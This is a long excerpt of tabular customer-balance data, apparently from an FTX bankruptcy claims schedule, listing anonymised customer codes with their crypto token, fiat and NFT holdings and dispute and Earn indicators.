| 07380911 | | BRZ[1], BTC[.02525974], CUSDT[4], DOGE[3694.42874131], ETH[.64096863], ETHW[.64069368], SHIB[1504711.93171922], SOL[64.37308981], TRX[3], USD[0.00] | Yes | |
| 07380912 | | USD[10.00] | | |
| 07380914 | | CUSDT[1], DOGE[4767.2591025], TRX[3], USD[22.26] | | |
| 07380918 | | DOGE[0], SHIB[3988080.68516783], USD[0.00] | Yes | |
| 07380919 | | CUSDT[1], USD[0.00] | | |
| 07380920 | | BTC[0], USD[0.01], USDT[0] | | |
| 07380921 | | USD[0.00], USDT[0] | | |
| 07380923 | | DOGE[418.8377904], ETH[.56766217], ETHW[27.98547516], GRT[1], USD[0.00], USDT[0] | Yes | |
| 07380924 | | USD[10.00] | | |
| 07380925 | | DOGE[298.93592167], ETH[.00591844], ETHW[.00585004], TRX[1], USD[0.00] | Yes | |
| 07380926 | | USD[10.00] | | |
| 07380929 | | BRZ[1], CUSDT[1], DOGE[116.27248221], USD[0.00] | | |
| 07380930 | | DOGE[2], USD[0.01] | | |
| 07380932 | | USD[10.00] | | |
| 07380933 | | DOGE[1500.81059059], ETH[.01046673], ETHW[.01046673], SHIB[162511.32626683], USD[0.00] | | |
| 07380934 | | USD[10.00] | | |
| 07380935 | | USD[10.00] | | |
| 07380937 | | USD[10.00] | | |
| 07380938 | | BTC[0], CUSDT[0], DOGE[0], ETH[0], ETHW[0], LTC[.17489295], SOL[0], TRX[0.21321109], USD[0.00] | | |
| 07380939 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07380940 | | CUSDT[1], DOGE[2], ETH[0], USD[0.00] | | |
| 07380941 | | TRX[1], USD[0.00] | | |
| 07380943 | | CUSDT[1], DOGE[136.17065778], USD[0.00] | | |
| 07380944 | | LTC[0.04265371], TRX[1], USD[0.00] | | |
| 07380945 | | USD[10.00] | | |
| 07380946 | | USD[11.07] | Yes | |
| 07380947 | | DOGE[0], USD[0.00] | | |
| 07380949 | | USD[10.00] | | |
| 07380950 | | USD[10.00] | | |
| 07380951 | | CUSDT[3], DOGE[2103.44280394], USD[0.00] | Yes | |
| 07380952 | | USD[10.00] | | |
| 07380953 | | DOGE[2611.813], ETH[.104895], ETHW[.104895], USD[2.55] | | |
| 07380954 | | BRZ[3], CUSDT[13], DOGE[607.90646329], ETH[.00000173], ETHW[.00000173], SOL[2.55332075], TRX[5], USD[0.00] | Yes | |
| 07380955 | | USD[10.00] | | |
| 07380956 | | BTC[.00129982], ETH[.00838709], ETHW[.00838709], GRT[16.83085642], USD[0.00] | | |
| 07380957 | | DOGE[1], USD[9.93] | | |
| 07380958 | | BRZ[1], CUSDT[4], DOGE[319.42939889], TRX[2], USD[0.01] | | |
| 07380960 | | BRZ[1], CUSDT[24], DOGE[2440.27046147], ETH[.02410532], ETHW[.02380414], SHIB[2397687.97686165], SOL[1.76512722], TRX[824.8904882], USD[0.01] | Yes | |
| 07380961 | | ALGO[.02939639], BRZ[1], CUSDT[15], DOGE[5917206.94561734], TRX[1], USD[5.54] | Yes | |
| 07380963 | | USD[0.03] | Yes | |
| 07380966 | | BTC[0], DOGE[1], ETH[0], LINK[0], TRX[0], USD[0.00], USDT[0] | | |
| 07380967 | | BCH[.01416404], USD[0.14] | | |
| 07380969 | | CUSDT[3], DOGE[5], USD[0.00] | | |
| 07380970 | | DOGE[1], USD[10.00] | | |
| 07380971 | | USD[0.03] | Yes | |
| 07380973 | | DOGE[413.86162099], TRX[1], USD[10.00] | | |
| 07380974 | | CUSDT[1], DOGE[435.34900544], USD[0.00] | | |
| 07380975 | | BCH[0.00517958], SOL[0], USD[0.00] | | |
| 07380976 | | DOGE[833.17118646], GRT[1096.69977401], USD[0.00] | Yes | |
| 07380977 | | BRZ[.81], CUSDT[1], DOGE[17.57062468], TRX[2], USD[0.04], USDT[0] | | |
| 07380979 | | USD[10.00] | | |
| 07380981 | | BTC[.00217072], DOGE[1], TRX[1], USD[0.00] | | |
| 07380985 | | CUSDT[2], USD[0.00] | | |
| 07380986 | | DOGE[24.82990768], USD[0.00] | | |
| 07380987 | | DOGE[1], USD[0.00] | | |
| 07380988 | | CUSDT[2], DOGE[2460.15284146], TRX[3], USD[0.00] | | |
| 07380991 | | BRZ[2], CUSDT[1], DOGE[7122.86053704], TRX[2], USD[0.00] | Yes | |
| 07380993 | | USD[10.00] | | |
| 07380994 | | USD[10.00] | | |
| 07380995 | | DOGE[1427.51556745], USD[0.00] | Yes | |
| 07380996 | | CUSDT[2], DOGE[353.60666332], USD[0.20] | | |
| 07380997 | | ETH[.00544894], ETHW[.00544894], USD[0.00] | | |
| 07380999 | | USD[10.00] | | |
| 07381003 | | USD[10.00] | | |
| 07381004 | | USD[10.00] | | |
| 07381005 | | BTC[.00000043], USD[0.00] | Yes | |
| 07381008 | | USD[0.00] | | |
| 07381009 | | BTC[.00021532], CUSDT[1], DOGE[8290.32605576], USD[0.00] | Yes | |
| 07381010 | | BAT[1], BRZ[1], CUSDT[1], TRX[1], USD[0.00] | Yes | |
| 07381012 | | USD[1.00] | | |
| 07381013 | | DOGE[21.48131107], USD[0.29] | | |
| 07381014 | | BRZ[3], BTC[0], CUSDT[2], DOGE[12.97781280], GRT[0], TRX[2.95283088], USD[0.00] | | |
| 07381015 | | DOGE[1], USD[0.00] | | |
| 07381016 | | BRZ[1], CUSDT[2], DOGE[2504.32756875], USD[8.69] | | |
| 07381017 | | USD[10.00] | | |
| 07381019 | | USD[10.00] | | |
| 07381020 | | BF_POINT[400], BRZ[3], CUSDT[14], DOGE[3], ETHW[.16756471], LINK[9.15649797], MATIC[51.77413165], SHIB[12], TRX[12], USD[0.00] | Yes | |
| 07381021 | | CUSDT[2], DOGE[3149.28881256], ETH[.03663146], ETHW[.03663146], SHIB[14424.06758705], TRX[765.80147666], USD[0.02] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07381022 | | DOGE[5905.16982264], GRT[1], NFT (294813367421154402/Coachella x FTX Weekend 1 #19381)[1], USD[510.00] | | |
| 07381023 | | CUSDT[1], DOGE[.1700234], USD[0.00] | | |
| 07381025 | | DOGE[0], ETH[0], USD[0.01] | | |
| 07381026 | | DOGE[1], ETH[.00000024], ETHW[.00000024], USD[0.00] | | |
| 07381027 | | BRZ[1], BTC[.00225295], CUSDT[1], DOGE[2168.32529213], TRX[1], USD[0.00] | | |
| 07381029 | | DOGE[.07785215], USD[0.00], YFI[.00004932] | | |
| 07381031 | | USD[1.06] | | |
| 07381032 | | USD[0.00] | | |
| 07381033 | | DOGE[172.8372613], USD[0.00] | | |
| 07381034 | | USD[0.01] | | |
| 07381035 | | CUSDT[3], DOGE[246.90038803], GRT[61.23825438], USD[0.00] | | |
| 07381036 | | AAVE[0.00476312], CUSDT[1], DOGE[3.56733707], ETH[0.00106857], ETHW[0.00105489], LINK[0.08928423], LTC[0], MATIC[1.54969406], SOL[0.09148372], UNI[0.07587992], USD[0.00] | Yes | |
| 07381037 | | USD[12.00] | | |
| 07381038 | | CUSDT[4], DOGE[.00208923], ETH[.00000004], ETHW[.00000004], USD[331.18] | | |
| 07381040 | | USD[0.00] | | |
| 07381041 | | USD[10.00] | | |
| 07381042 | | BTC[0], DOGE[0], GRT[0], TRX[1.18758341], USD[0.00] | | |
| 07381043 | | USD[0.00] | | |
| 07381044 | | CUSDT[5], DOGE[.09001122], GRT[1.32292818], USD[21.16] | | |
| 07381045 | | CUSDT[2], DOGE[36.96742661], USD[0.00] | | |
| 07381047 | | DOGE[679.38492809], KSHIB[886.2036095], SHIB[2333778.85142983], USD[0.00] | Yes | |
| 07381048 | | BTC[0], DOGE[0], LTC[0], SHIB[5664.61944443], SUSHI[0], USD[0.00] | Yes | |
| 07381050 | | DOGE[116.79763088], USD[0.56] | | |
| 07381051 | | CUSDT[1], DOGE[605.96932542], USD[0.00] | | |
| 07381052 | | CUSDT[2], DOGE[ 12401427], SHIB[1], USD[0.01] | Yes | |
| 07381053 | | USD[10.00] | | |
| 07381054 | | CUSDT[2], DOGE[4485.3124695], MATIC[79.59140117], SHIB[1], SOL[9.19523934], TRX[1], USD[10.42] | Yes | |
| 07381055 | | USD[10.00] | | |
| 07381056 | | USD[0.00] | | |
| 07381057 | | BRZ[1], USD[10.00] | | |
| 07381059 | | ETH[.00533109], ETHW[.00533109], USD[0.00] | | |
| 07381060 | | USD[10.00] | | |
| 07381061 | | USD[10.00] | | |
| 07381062 | | USD[10.00] | | |
| 07381063 | | CUSDT[1], DOGE[0], TRX[0], USD[0.01], USDT[0] | | |
| 07381065 | | DOGE[124.26803023], USD[0.00] | | |
| 07381066 | | BTC[.00030781], GRT[.03924804], USD[0.00] | Yes | |
| 07381069 | | USD[10.00] | | |
| 07381072 | | ETH[.14985], ETHW[.14985], USD[3.00] | | |
| 07381075 | | USD[10.00] | | |
| 07381076 | | CUSDT[1], DOGE[31.75618868], GRT[22.20249185], USD[0.00] | | |
| 07381077 | | BTC[.00075531], DOGE[119.18893281], USD[0.00] | | |
| 07381078 | | CUSDT[1], DOGE[259.73111719], SHIB[274122.80701754], USD[0.00] | | |
| 07381079 | | USD[10.00] | | |
| 07381080 | | DOGE[748.34651264], SHIB[3], TRX[3], USD[67.32] | Yes | |
| 07381081 | | BTC[0], CUSDT[1], USD[0.00] | | |
| 07381082 | | USD[10.00] | | |
| 07381083 | | USD[10.00] | | |
| 07381084 | | USD[10.00] | | |
| 07381086 | | UNI[.361336889], USD[0.00] | Yes | |
| 07381087 | | ETH[.00563097], ETHW[.00563097], USD[0.00] | | |
| 07381088 | | CUSDT[1], DOGE[0], USD[0.00] | Yes | |
| 07381089 | | DOGE[.158], LINK[0.14657642], SOL[0], USD[72.89] | | |
| 07381090 | | USD[10.00] | | |
| 07381094 | | USD[0.00] | | |
| 07381095 | | DOGE[0], USD[0.60], USDT[0] | | |
| 07381096 | | USD[10.00] | | |
| 07381097 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07381098 | | DOGE[24.84799919], TRX[1], USD[0.00] | | |
| 07381099 | | BAT[.00015065], DOGE[.01139642], GRT[.00237605], SHIB[2.60780318], TRX[.00134911], USD[0.01] | Yes | |
| 07381100 | | CUSDT[5], DOGE[0], SHIB[3], USD[0.01] | | |
| 07381101 | | BRZ[8.81949682], CUSDT[1], DOGE[152.93405171], USD[0.33] | | |
| 07381103 | | TRX[.24001987], USD[0.00] | | |
| 07381104 | | USD[0.00] | | |
| 07381105 | | USD[10.00] | | |
| 07381106 | | SOL[.14252083], USD[0.00] | | |
| 07381107 | | USD[10.00] | | |
| 07381108 | | DOGE[1], USD[0.01] | | |
| 07381109 | | CUSDT[3], DOGE[195.66079181], ETH[.05554841], ETHW[.05554841], TRX[2], USD[0.22] | | |
| 07381110 | | DOGE[29.96400663], USD[0.00] | | |
| 07381111 | | USD[10.00] | | |
| 07381112 | | BTC[.00008391], ETH[.00241283], ETHW[.00241283], SOL[.00385252], USD[0.02], YFI[.00002523] | | |
| 07381113 | | BTC[.00019351], USD[0.00] | | |
| 07381114 | | CUSDT[1], USD[0.00] | | |
| 07381115 | | USD[10.00] | | |
| 07381116 | | USD[10.00] | | |
| 07381118 | | USD[10.00] | | |
| 07381119 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07381120 | | USD[10.00] | | |
| 07381121 | | CUSDT[1], DOGE[3559.38062327], USD[0.00] | | |
| 07381123 | | BAT[3], BRZ[1], BTC[.01122205], CUSDT[6], DOGE[1204.92372503], ETH[.25885047], ETHW[.25885047], SHIB[675403.86410914], TRX[101.19591167], USD[0.00], USDT[1] | | |
| 07381124 | | BRZ[1], CUSDT[471.39586653], DOGE[6.55377683], GRT[2], LTC[6.17298242], TRX[17.79925601], USD[1.41] | | |
| 07381125 | | TRX[1], USD[0.08] | | |
| 07381126 | | DOGE[.57863398], USD[0.00] | | |
| 07381127 | | DOGE[0], TRX[0], USD[0.08] | Yes | |
| 07381128 | | BTC[0], ETH[0], LINK[.00000001], SOL[0], USD[0.00], USDT[0] | | |
| 07381130 | | USD[10.00] | | |
| 07381131 | | USD[10.00] | | |
| 07381132 | | USD[10.00] | | |
| 07381133 | | BCH[0.00577282], BTC[0.00006361], CUSDT[44.69223944], DOGE[15.09922417], LTC[0], USD[0.00] | | |
| 07381135 | | DOGE[141.02415123], USD[0.00] | | |
| 07381136 | | TRX[200.20693388], USD[0.00] | | |
| 07381137 | | BTC[0], SOL[0], USD[205.47], USDT[0.00000231] | | |
| 07381138 | | CUSDT[3], DOGE[2000.02292069], ETH[.01829671], ETHW[.01806419], TRX[64.07075136], USD[0.00] | Yes | |
| 07381139 | | DOGE[32.59746367], ETH[.00317364], ETHW[.00317364], TRX[41.7347813], USD[0.00] | | |
| 07381140 | | SOL[.09534492], USD[0.00] | Yes | |
| 07381141 | | DOGE[5140.16111781], GRT[1], USD[4.72], USDT[1] | | |
| 07381142 | | DOGE[2], ETH[0.00000001], GRT[0], LINK[0.00038304], SOL[0.35822776], SUSHI[0], TRX[2], USD[0.00] | | |
| 07381143 | | USD[10.00] | | |
| 07381144 | | ETH[.01249045], ETHW[.01249045], USD[0.00] | | |
| 07381145 | | USD[10.00] | | |
| 07381147 | | USD[10.00] | | |
| 07381148 | | USD[10.00] | | |
| 07381149 | | USD[10.00] | | |
| 07381150 | | USD[10.00] | | |
| 07381152 | | GRT[1], SHIB[1], TRX[1], USD[20083.36], USDT[0] | | |
| 07381153 | | BTC[0], CUSDT[1], DOGE[8], ETH[0], EUR[0.00], GRT[0], LTC[0], SUSHI[0], UNI[0], USD[0.01] | | |
| 07381156 | | USD[0.00], USDT[0] | | |
| 07381157 | | USD[0.00] | | |
| 07381158 | | BRZ[0], BTC[0], CUSDT[1], DOGE[0], USD[0.00], USDT[0] | | |
| 07381162 | | BRZ[2], CUSDT[1], DOGE[.12017433], TRX[2], USD[0.11] | | |
| 07381163 | | BRZ[2], DOGE[1], USD[168.13] | | |
| 07381164 | | CUSDT[1], DOGE[227.46263291], USD[0.00] | | |
| 07381165 | | USD[10.00] | | |
| 07381166 | | BTC[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07381167 | | BAT[2.07014244], CUSDT[4], DOGE[9566.10388481], NFT (294890420972119630/Cyber Pharmacist 7977)[1], NFT (295654063267905687/ApexDucks #186)[1], NFT (303696502126993679/Mech #8340)[1], NFT (423585808291494263/SOLYETIS #5010)[1], NFT (464031292700301661/Oink 1574)[1], NFT (518554813569195818/SOLYETIS #5896)[1], SOL[25.07243182], SUSHI[326.65601259], TRX[2], USD[14.65], USDT[1.07857799] | Yes | |
| 07381169 | | USD[10.00] | | |
| 07381170 | | USD[10.00] | | |
| 07381171 | | USD[10.00] | | |
| 07381172 | | CUSDT[1], DAI[9.90053722], SUSHI[3.79010846], USD[0.00] | | |
| 07381174 | | SHIB[4], USD[475.42] | Yes | |
| 07381175 | | BRZ[4], CUSDT[11], LINK[1.32101973], TRX[6], USD[0.00] | Yes | |
| 07381176 | | DOGE[135.63704719], USD[0.00] | | |
| 07381177 | | BRZ[2], CUSDT[2], DOGE[667.83121706], ETH[0], LINK[4.9155564], LTC[.24633479], TRX[1], USD[0.00] | | |
| 07381178 | | BAT[.00004421], CUSDT[6], GRT[1.00390385], SHIB[1], TRX[8.00087675], USD[0.00] | Yes | |
| 07381180 | | USD[10.00] | | |
| 07381181 | | BRZ[4], CUSDT[14], SHIB[14.4136854], TRX[3], USD[2.26] | Yes | |
| 07381182 | | USD[10.00] | | |
| 07381183 | | BAT[2], BRZ[1], CUSDT[5], GRT[1], TRX[6], USD[0.00] | | |
| 07381184 | | USD[10.00] | | |
| 07381186 | | BTC[.00177885], DOGE[347.22772493], ETH[.02065889], ETHW[.02065889], TRX[2003.23453976], USD[0.27] | | |
| 07381188 | | BAT[2161.24864886], CUSDT[1], DOGE[13719.37362104], TRX[20517.90285041], USD[0.00] | | |
| 07381189 | | USD[10.00] | | |
| 07381190 | | USD[10.00] | | |
| 07381191 | | USD[10.00] | | |
| 07381192 | | BTC[.00229377], DOGE[2], SHIB[1216196.8808127], USD[0.00] | | |
| 07381194 | | CUSDT[10], DOGE[274.89517201], TRX[2], USD[0.00] | | |
| 07381195 | | BTC[.00013171], ETH[.00370526], ETHW[.00366419], USD[0.00] | Yes | |
| 07381196 | | BTC[.00020288], DOGE[.00468502], USD[0.00] | Yes | |
| 07381197 | | USD[10.00] | | |
| 07381198 | | CUSDT[6], DOGE[71.47517622], TRX[.00046737], USD[0.00] | | |
| 07381199 | | BCH[0], BRZ[0], LINK[0], LTC[0], USD[0.01], USDT[0] | | |
| 07381200 | | DOGE[1478.30978792], USD[-45.00] | | |
| 07381201 | | USD[10.00] | | |
| 07381202 | | CUSDT[2], DOGE[.00221929], TRX[1], USD[0.00] | Yes | |
| 07381203 | | USD[0.00] | | |
| 07381205 | | BAT[1], GRT[1367.7883598], USD[0.00] | | |
| 07381206 | | DOGE[79.75887297], USD[0.00] | | |
| 07381207 | | BAT[1], BRZ[2], CUSDT[8], DOGE[1423.03687033], GRT[3], TRX[5], USD[0.00], USDT[4] | | |
| 07381208 | | USD[10.00] | | |
| 07381210 | | BRZ[1], CUSDT[1], TRX[2], USD[90.90] | | |
| 07381211 | | BRZ[1], CUSDT[5], USD[0.01] | | |
| 07381212 | | USD[0.00] | | |
| 07381213 | | DOGE[183.5119302], TRX[1], USD[0.00] | | |
| 07381214 | | CUSDT[2], DOGE[1195.4215371], TRX[1], USD[0.00] | | |
| 07381215 | | CUSDT[1], DOGE[2.0002361], LINK[.00038476], TRX[.00022261], USD[35.04] | | |
| 07381216 | | BAT[2.01142982], BRZ[2], DOGE[3], ETH[0], LTC[0], SHIB[1.00000001], SOL[0], SUSHI[0], TRX[2], USD[0.01], USDT[1.06487570] | Yes | |
| 07381217 | | USD[10.00] | | |
| 07381219 | | CUSDT[1], USD[0.53] | | |
| 07381220 | | CUSDT[1], DOGE[258.25834322], USD[0.00] | | |
| 07381221 | | CUSDT[1], USD[0.00], USDT[.96074522] | | |
| 07381222 | | USD[10.00] | | |
| 07381223 | | CUSDT[1], DOGE[1009.14412982], USD[10.00] | | |
| 07381224 | | TRX[2], USD[0.00] | | |
| 07381225 | | USD[1.52] | Yes | |
| 07381226 | | USD[10.00] | | |
| 07381227 | | CUSDT[1], DOGE[175.53861038], TRX[1], USD[0.19] | | |
| 07381228 | | USD[10.00] | | |
| 07381229 | | USD[10.00] | | |
| 07381231 | | USD[10.00] | | |
| 07381232 | | DOGE[1], TRX[1], USD[81.75] | | |
| 07381233 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07381234 | | CUSDT[4], DOGE[154.17345469], TRX[1], USD[0.00] | | |
| 07381235 | | CUSDT[1], SHIB[1], TRX[1395.38848228], USD[20.00] | | |
| 07381236 | | USD[10.00] | | |
| 07381237 | | BRZ[1], DOGE[1], SHIB[3616989.7062049], TRX[482.12589851], USD[0.00] | Yes | |
| 07381238 | | BTC[.00000009], DOGE[.00166967], USD[0.00] | | |
| 07381239 | | BTC[.00044595], DOGE[1], USD[0.01] | | |
| 07381240 | | USD[10.00] | | |
| 07381241 | | DOGE[22.16184058], TRX[1], USD[0.00] | Yes | |
| 07381242 | Contingent, Disputed | USD[10.28] | Yes | |
| 07381243 | | BTC[0], ETH[0], NFT (506285085295666141/Mystery Box)[1], SOL[0], SUSHI[0], USD[0.00] | | |
| 07381245 | | USD[10.00] | | |
| 07381246 | | USD[10.00] | | |
| 07381247 | | BRZ[3], CUSDT[6], DOGE[1], ETH[1.01613568], ETHW[1.01613568], GRT[1], KSHIB[140.89462167], TRX[3], USD[1238.59] | | |
| 07381248 | | DOGE[0.00004302], TRX[1], USD[0.00] | | |
| 07381249 | | DOGE[122.1737396], USD[0.00] | | |
| 07381250 | | USD[10.00] | | |
| 07381251 | Contingent, Disputed | USD[10.00] | | |
| 07381252 | | USD[0.00] | | |
| 07381253 | | CUSDT[1], DOGE[1149.95806839], TRX[1], USD[0.00] | | |
| 07381255 | | USD[10.00] | | |
| 07381256 | | BCH[.80914802], CUSDT[4], DOGE[.17462426], GRT[.44687203], SHIB[5656168.81113804], SOL[11.28787502], TRX[3.00000044], USD[0.00], USDT[0] | | |
| 07381258 | | USD[10.00] | | |
| 07381259 | | BRZ[57.71778932], USD[0.00] | Yes | |
| 07381263 | | BTC[.00003207], DOGE[0], ETH[.00009683], ETHW[.00009683], LINK[0], SOL[0], TRX[0], UNI[0], USD[0.00] | | |
| 07381264 | | DOGE[131.53021027], TRX[1], USD[0.69] | | |
| 07381265 | | BRZ[1], CUSDT[2], DOGE[0.00007554], TRX[1], USD[0.01] | | |
| 07381266 | | BTC[.00010706], CUSDT[3], DOGE[172.61959641], ETH[.00278122], ETHW[.00278122], USD[0.00] | | |
| 07381267 | | USD[10.00] | | |
| 07381268 | | BRZ[1], CUSDT[3], DOGE[1], GRT[.00049282], SHIB[3], SOL[0], USD[0.00] | Yes | |
| 07381269 | | DOGE[142.20950047], USD[0.00] | | |
| 07381270 | | USD[10.00] | | |
| 07381271 | | BRZ[1], BTC[.0022394], CUSDT[1], TRX[1], USD[4372.39] | | |
| 07381272 | | TRX[172.67745371], USD[0.00] | | |
| 07381273 | | DOGE[825.23165476], USD[0.00] | | |
| 07381274 | | SOL[0], USD[2308.48] | | |
| 07381275 | | BAT[1.01655549], BRZ[1], CUSDT[3], TRX[1], USD[190.64], USDT[1.11030948] | Yes | |
| 07381276 | | DOGE[478.44449266], USD[84.86] | | |
| 07381277 | | CUSDT[6], SOL[0], TRX[2], USD[0.00] | | |
| 07381278 | | USD[10.00] | | |
| 07381279 | | USD[10.00] | | |
| 07381280 | | USD[10.00] | | |
| 07381281 | | BAT[750.21618229], CUSDT[3], DOGE[1551.4819088], GRT[505.70605054], TRX[1], USD[0.00] | | |
| 07381282 | | USD[0.01] | | |
| 07381283 | | CUSDT[4], TRX[1], USD[0.00] | | |
| 07381284 | | BTC[.00223694], CUSDT[5], DOGE[983.38955309], ETH[.02873754], ETHW[.02838186], SHIB[1943789.47449529], TRX[2], USD[11.07] | Yes | |
| 07381285 | | BAT[24.57679157], BRZ[5.07952967], BTC[.00072229], CUSDT[23.00005526], DOGE[0], GRT[0], SHIB[1936548.68565125], TRX[4], USD[0.00], USDT[0.00202592] | Yes | |
| 07381286 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07381287 | | DOGE[36.63359532], TRX[1], USD[0.00] | | |
| 07381288 | | BRZ[1], USD[0.00] | | |
| 07381289 | | BAT[0], BRZ[1], CUSDT[13], DOGE[3], ETH[0], KSHIB[0], LTC[0.10134602], SHIB[1], SOL[0.00000916], SUSHI[2.22365712], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07381290 | | MATIC[1], SHIB[3], TRX[1.000003], USDT[0] | | |
| 07381291 | | USD[10.00] | | |
| 07381294 | | DOGE[135.17077272], USD[0.00] | | |
| 07381295 | | USD[10.00] | | |
| 07381296 | | USD[20.00] | | |
| 07381297 | | CUSDT[2], DOGE[1], TRX[2], USD[55.06] | | |
| 07381298 | | USD[10.00] | | |
| 07381299 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07381300 | | USD[10.00] | | |
| 07381303 | | USD[10.00] | | |
| 07381304 | | NFT (362416981750309309/Coachella x FTX Weekend 1 #22953)[1], USD[0.00] | | |
| 07381305 | | USD[10.00] | | |
| 07381306 | | USD[0.16] | | |
| 07381307 | | BAT[2], BRZ[1], BTC[0], CUSDT[4], GRT[0], TRX[3], USD[0.00], USDT[1] | | |
| 07381310 | | CUSDT[3], DOGE[863.54720735], USD[0.00] | | |
| 07381311 | | USD[0.00] | | |
| 07381314 | | CUSDT[1], USD[0.00], USDT[0] | | |
| 07381315 | Contingent, Unliquidated | SOL[.21762578], USD[25.16] | Yes | |
| 07381317 | | CUSDT[1], USD[0.00] | Yes | |
| 07381318 | | BTC[0], ETH[.00498], ETHW[.00498], USD[1.40] | | |
| 07381319 | | USD[10.00] | | |
| 07381320 | | USD[0.65] | | |
| 07381322 | | BTC[.00142643], SHIB[1], USD[0.00] | Yes | |
| 07381323 | | BRZ[1], CUSDT[3], DOGE[.00000834], USD[0.08] | | |
| 07381324 | | DOGE[3470.0312132], SHIB[3544891.17162329], USD[0.00] | | |
| 07381325 | | USD[10.00] | | |
| 07381327 | | DOGE[541.25242268], SHIB[2531553.75600458], USD[0.00] | Yes | |
| 07381329 | | USD[10.00] | | |
| 07381330 | | CUSDT[1], DOGE[904.90455492], USD[0.00] | | |
| 07381331 | | DOGE[5.67815941], LTC[.74249973], SHIB[35448.00744416], USD[0.00] | Yes | |
| 07381333 | | DOGE[.00129973], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07381334 | | CUSDT[5], TRX[2], USD[0.00] | | |
| 07381336 | | USD[10.00] | | |
| 07381339 | | BAT[1], BRZ[3], TRX[4], USD[0.00] | | |
| 07381340 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07381341 | | BTC[0.00027633], CUSDT[1], DAI[0], DOGE[2], ETH[.01412111], ETHW[0.01394314], SUSHI[3.26506830], TRX[1], USD[0.00] | Yes | |
| 07381342 | | DOGE[1], USD[0.00] | | |
| 07381343 | | USD[10.00] | | |
| 07381344 | | USD[10.00] | | |
| 07381345 | | BRZ[1], DOGE[475.19013851], GRT[1], USD[0.89] | | |
| 07381346 | | DOGE[2], LINK[2.21233041], TRX[1944.48566327], USD[0.21] | | |
| 07381347 | | BAT[1.01655493], CUSDT[6], DOGE[3], SOL[41.27680119], SUSHI[20.93803219], TRX[2903.31011343], USD[0.00] | Yes | |
| 07381348 | | DOGE[220.81609606], USD[0.00] | Yes | |
| 07381349 | | DAI[.00002475], DOGE[323.93237055], TRX[853.3154682], USD[0.00] | Yes | |
| 07381350 | | USD[10.00] | | |
| 07381351 | | USD[10.00] | | |
| 07381352 | | DOGE[2615.26365059], TRX[1], USD[5.00] | | |
| 07381353 | | USD[0.00], USDT[0.00000001] | | |
| 07381355 | | USD[10.00] | | |
| 07381356 | | CUSDT[1], DOGE[15.04477996], TRX[1], USD[0.00] | | |
| 07381357 | | USD[10.00] | | |
| 07381358 | | LINK[.37532583], USD[0.00] | | |
| 07381359 | | DAI[9.9133605], DOGE[1], USD[0.00] | | |
| 07381360 | | CUSDT[1], DOGE[28.92992489], USD[0.00] | | |
| 07381361 | | DOGE[57.17351036], USD[0.00] | | |
| 07381362 | | USD[0.00] | | |
| 07381363 | | BTC[.00019675], CUSDT[25], DOGE[1], TRX[4], USD[0.00] | Yes | |
| 07381364 | | USD[10.00] | | |
| 07381365 | | CUSDT[231.73458539], DOGE[5.27122895], USD[8.15] | | |
| 07381366 | | SHIB[138312.58644536], USD[0.00] | | |
| 07381367 | | USD[10.00] | | |
| 07381368 | | USD[10.00] | | |
| 07381369 | | CUSDT[254.87593062], USD[5.50] | Yes | |
| 07381370 | | CUSDT[1], TRX[2], USD[0.00], USDT[0] | | |
| 07381371 | | CUSDT[1], DOGE[2], TRX[1], USD[0.00], USDT[0] | | |
| 07381373 | | CUSDT[1], DOGE[41.95870415], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07381375 | | CUSDT[1.69840314], USD[0.00] | | |
| 07381376 | | DOGE[138.24849115], USD[0.00] | | |
| 07381377 | | USD[0.00] | | |
| 07381378 | Contingent, Disputed | CUSDT[3], DOGE[2], USD[0.84] | | |
| 07381379 | | BAT[10.77147594], USD[0.00] | | |
| 07381380 | | DOGE[3038.84022972], TRX[1], USD[10.00] | | |
| 07381381 | | USD[10.00] | | |
| 07381382 | | BAT[1], BTC[0], DOGE[4.00016516], USD[0.01] | | |
| 07381384 | | USD[10.00] | | |
| 07381385 | | DOGE[0], MATIC[0], USD[0.01] | Yes | |
| 07381386 | | TRX[1], USD[0.00] | | |
| 07381387 | | BRZ[4], CUSDT[31], DOGE[0], ETH[0], ETHW[0], LINK[0], TRX[588.09337633], UNI[0], USD[0.00] | | |
| 07381388 | | CUSDT[3], DOGE[201.24753101], USD[0.00] | | |
| 07381389 | | USD[0.03] | | |
| 07381390 | | USD[10.00] | | |
| 07381391 | | BRZ[1], CUSDT[3], DOGE[.00001214], SHIB[770677.64206972], TRX[2], USD[0.00], USDT[16.18602585] | Yes | |
| 07381393 | | DOGE[136.40968083], TRX[1], USD[0.00] | | |
| 07381394 | | CUSDT[3], USD[0.01] | | |
| 07381395 | | USD[10.00] | | |
| 07381396 | | USD[10.00] | | |
| 07381399 | | USD[10.00] | | |
| 07381400 | | USD[10.00] | | |
| 07381401 | | DOGE[2], GRT[1.84596414], TRX[0], USD[0.00] | Yes | |
| 07381402 | | USD[10.00] | | |
